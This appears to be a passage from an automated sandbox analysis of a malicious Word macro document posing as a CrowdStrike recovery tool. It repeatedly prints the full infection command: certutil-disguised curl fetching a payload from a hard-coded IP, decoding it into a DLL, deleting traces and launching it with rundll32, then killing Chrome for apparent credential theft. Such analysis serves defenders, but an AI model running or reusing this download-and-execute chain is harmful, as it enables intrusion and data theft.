Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C157A0 appears 36 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92CABF00 appears 47 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C127F0 appears 47 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C90FF0 appears 434 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084201D appears 39 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087201D appears 39 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084D632 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0083913E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 00842564 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 008720E6 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084D6AD appears 303 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087251E appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084251E appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087D6AD appears 303 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0086913E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 008420E6 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087D632 appears 247 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 00872564 appears 48 times
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOCM@69/284@2/4
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0086310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,13_2_0086310D
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{EDECE918-A2EA-49DC-A414-445477A4F37D} - OProcSessId.datJump to behavior
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE indicator, Word Document stream: true
Source: Element design set.dotx.0.drOLE indicator, Word Document stream: true
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drOLE indicator, Word Document stream: true
Source: Equations.dotx.0.drOLE indicator, Word Document stream: true
Source: Insight design set.dotx.0.drOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.26.drOLE indicator, Word Document stream: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE document summary: title field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE document summary: author field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE document summary: edited time not present or 0
Source: ~WRC0000.tmp.26.drOLE document summary: title field not present or empty
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7835E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2777616664.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4258973771.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4258973771.0000027F6C366000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2777450961.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2778177784.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmReversingLabs: Detection: 26%
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exitJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txtJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txtJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txtJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dllJump to behavior
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
